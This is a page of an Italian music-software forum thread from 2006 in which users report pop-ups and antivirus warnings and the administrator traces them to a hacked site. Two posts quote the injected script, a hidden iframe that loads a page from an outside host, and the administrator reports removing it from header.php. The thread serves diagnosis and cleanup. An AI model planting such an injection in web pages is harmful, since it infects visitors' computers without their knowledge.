Se questo sito ti è utile fai una donazione!
Tutti i contributi andranno a coprire i costi per il mantenimento del sito e del forum.
Un grosso grazie a chi vorrà supportarci.
I Forum di Cubase.it, il sito italiano su Cubase, Audio, MIDI e Home Recording


Post New Topic  Post A Reply
Profilo Personale | Registrazione | Cerca nel Forum | Faq del Forum | Pagina Principale
  next oldest topic   next newest topic
» I Forum di Cubase.it, il sito italiano su Cubase, Audio, MIDI e Home Recording   » Il Resto   » La Stanza di Cubase.it   » POP UP in questo forum (Page 3)

 - UBBFriend: Spedisci questo topic ad un amico  
This topic is comprised of pages: 1  2  3  4  5 
 
Autore Topic: POP UP in questo forum
pierecall
Member
Member # 1290

 - posted 20. Giugno 2006 20:01      Profile for pierecall   Email pierecall         Edit/Delete Post   Reply With Quote 
Tutte cose sconosciute nel mondo mac

Mai usato ne antivirus ne apyware ne firewall

W osx w il mac w la libertà

Gennaro


Messaggi: 5876 | Data Registrazione: Ago 2002  |  IP: Logged
PeterPa
Member
Member # 2257

 - posted 20. Giugno 2006 20:58      Profile for PeterPa   Email PeterPa         Edit/Delete Post   Reply With Quote 
ripeto, io faccio "pulsante destro" + chiudi.
ed il serpente,figlio di troia, muore con una mela in bocca.
se lascio cubase.it sempre aperto non succede nulla.
queste cose servono per far comprare anti spyware.

Messaggi: 3983 | Data Registrazione: Mag 2003  |  IP: Logged
tinc
Junior Member
Member # 7538

 - posted 20. Giugno 2006 21:07      Profile for tinc   Email tinc         Edit/Delete Post   Reply With Quote 
guarda che il mac si salva dai virus solo perche' e' meno diffuso di windows, non di certo perche' e' inespugnabile

come disse fry: nel ventesimo secolo a new york non guidava nessuno.. c'era troppo traffico!


Messaggi: 200 | Data Registrazione: Mag 2006  |  IP: Logged
cubaser
Member
Member # 5766

 - posted 20. Giugno 2006 21:51      Profile for cubaser   Email cubaser         Edit/Delete Post   Reply With Quote 
io adopero 3 pc per "cubasiITzzare" e su tutti e tre mi si è presentato il problema. 2 (portatili) hanno IE, il terzo, fisso ha firefox. su un portatile e sul fisso sono riuscito a eliminare il problema (non chiedetemi come, ho fatto più pulizie di una perpetua) sul secondo portatile ancora no. il bello è che se chiamo su google un topic e poi risalgo all'indice dei forum non succede nulla.
Messaggi: 17863 | Data Registrazione: Giu 2005  |  IP: Logged
coach
Member
Member # 4750

 - posted 21. Giugno 2006 07:10      Profile for coach   Email coach         Edit/Delete Post   Reply With Quote 
A me l'antivirus mi avvisa che codesto sito ha un virus dal nome strano e se lo voglio rimuovere
Messaggi: 1369 | Data Registrazione: Dic 2004  |  IP: Logged
pierecall
Member
Member # 1290

 - posted 21. Giugno 2006 10:00      Profile for pierecall   Email pierecall         Edit/Delete Post   Reply With Quote 
Ho visto che su alcuni pc esce la seguente stringa
No Mac no Party con la faccia di Clooney che sorride

gennaro


Messaggi: 5876 | Data Registrazione: Ago 2002  |  IP: Logged
tinc
Junior Member
Member # 7538

 - posted 21. Giugno 2006 10:06      Profile for tinc   Email tinc         Edit/Delete Post   Reply With Quote 
Provate con CCleaner
http://www.ccleaner.com/

Messaggi: 200 | Data Registrazione: Mag 2006  |  IP: Logged
vakkadj
Member
Member # 6422

 - posted 21. Giugno 2006 11:22      Profile for vakkadj   Email vakkadj         Edit/Delete Post   Reply With Quote 
quote:
Originally posted by pierecall:
Ho visto che su alcuni pc esce la seguente stringa
No Mac no Party con la faccia di Clooney che sorride

gennaro


io preferisco la faccia della Paltrow che dice no Hp no party...e io che le rispondo...nel mio letto ce ne sono due e ti mettiamo in mezzo...

mele del ca77o!!!!

ciao melinda (gennariello).... fai il bravo e comprati un pc

ciao vak


Messaggi: 2808 | Data Registrazione: Ott 2005  |  IP: Logged
raffaello
Member
Member # 1794

 - posted 21. Giugno 2006 15:37      Profile for raffaello   Email raffaello         Edit/Delete Post   Reply With Quote 
quote:
Originally posted by MichyLee:
Il problema risiede, sempre che non dica eresie, nella home e precisamente in tale script, presente nel codice sorgente:
<script language=javascript>document.write(unescape('<iframe src=http://ad0299.vogservice.com/ie0509.htm WIDTH=1 BORDER=1 HEIGHT=1 style=display:none></IFRAME>'))</script>

confermo è in questa riga :

<script language=javascript>document.write(unescape('<iframe src=http://ad0299.vogservice.com/ie0509.htm WIDTH=1 BORDER=1 HEIGHT=1 style=display:none></IFRAME>'))</script>


e quì c'è qualcosa che può interessare cj (mi sa che ti hanno hackerato il sito)
http://www.mkportal.it/support/archive/index.php/t-11019.html


Cj, urge un controllo



Messaggi: 1699 | Data Registrazione: Gen 2003  |  IP: Logged
cj
Administrator
Member # 236

 - posted 21. Giugno 2006 19:36      Profile for cj   Email cj         Edit/Delete Post   Reply With Quote 
sono 36 ore che sto cercando di capire...ma non sono riuscito a farlo fino ad ora. Il file header.php (uno degli utlimi che ho controllato, ovvio) conteneva quella riga di codice bastarda...ora dovrebbe non esserci più.

Ma ho letto ( http://forum.html.it/forum/showthread.php?threadid=987058 ) che potrebbe ritornare ed il tutto dovrebbe essere causato dal forum in php che fa parte del pacchetto di php-nuke ma che al momento è attivo solo per test amministrativi.

non appena riapparisse qualcosa del genere potete segnalarmelo via email o qui, plis?

a me quella riga non appare più nel codice, fatemi sapere

bye

cj


Messaggi: 13118 | Data Registrazione: Mar 2001  |  IP: Logged
PeterPa
Member
Member # 2257

 - posted 21. Giugno 2006 21:08      Profile for PeterPa   Email PeterPa         Edit/Delete Post   Reply With Quote 
ora 'nc'è sta chiù.

Messaggi: 3983 | Data Registrazione: Mag 2003  |  IP: Logged
Arturio
Member
Member # 5337

 - posted 21. Giugno 2006 22:29      Profile for Arturio           Edit/Delete Post   Reply With Quote 
confermo,x il momento nn s'è fatto + vivo....
Messaggi: 859 | Data Registrazione: Mar 2005  |  IP: Logged
Kenny
Member
Member # 2271

 - posted 22. Giugno 2006 00:36      Profile for Kenny           Edit/Delete Post   Reply With Quote 
Quindi scusate l'ignoranza...non è qualcosa che è nei nostri pc ma nel sito? O meglio NEI siti?

A me qui è apparso solo una volta e ho scritto subito il topic perchè mi sembrava strano che fosse un pop up che ti chiedeva di comprare cubase e che fosse simile a quelli spuntatomi negli altri siti.....


Messaggi: 1286 | Data Registrazione: Mag 2003  |  IP: Logged
tinc
Junior Member
Member # 7538

 - posted 22. Giugno 2006 10:09      Profile for tinc   Email tinc         Edit/Delete Post   Reply With Quote 
confermo, non c'e' piu'!
Messaggi: 200 | Data Registrazione: Mag 2006  |  IP: Logged
cj
Administrator
Member # 236

 - posted 22. Giugno 2006 12:15      Profile for cj   Email cj         Edit/Delete Post   Reply With Quote 
quote:
Originally posted by Kenny:
Quindi scusate l'ignoranza...non è qualcosa che è nei nostri pc ma nel sito? O meglio NEI siti?

A me qui è apparso solo una volta e ho scritto subito il topic perchè mi sembrava strano che fosse un pop up che ti chiedeva di comprare cubase e che fosse simile a quelli spuntatomi negli altri siti.....


è un cavallo di troia che attacca i buchi dei piccì con windows sfruttando una falla del sistema di pubblicazione delle pagine web. In pratica quest'ultima falla permette di scrivere la riga di codice citata e di conseguenza chi usa uno dei vari win (98, 2000, xp, etc.) si ritrova quel popup non proprio benevolo ed infatti segnalato come virus da chi ha un antivirus.

colpe a metà, quindi.

bye
cj


Messaggi: 13118 | Data Registrazione: Mar 2001  |  IP: Logged


Fuso Orario: CET
This topic is comprised of pages: 1  2  3  4  5 
 
Post New Topic  Post A Reply Chiudi Topic    Sposta Topic    Delete Topic next oldest topic   next newest topic
 - Versione stampabile di questo topic
Hop To:

Contattaci | www.cubase.it | Cubase.it e la Privacy

© 2000 - 2023. Il materiale di questo forum e del sito è di proprietà di chi scrive. Nel caso vogliate citare del contenuto, indicatene sempre la fonte.

Powered by Infopop
UBB.classicTM 6.3.1.2

Se questo sito ti è utile fai una donazione!
Tutti i contributi andranno a coprire i costi per il mantenimento del sito e del forum.

Un grosso grazie a chi vorrà supportarci.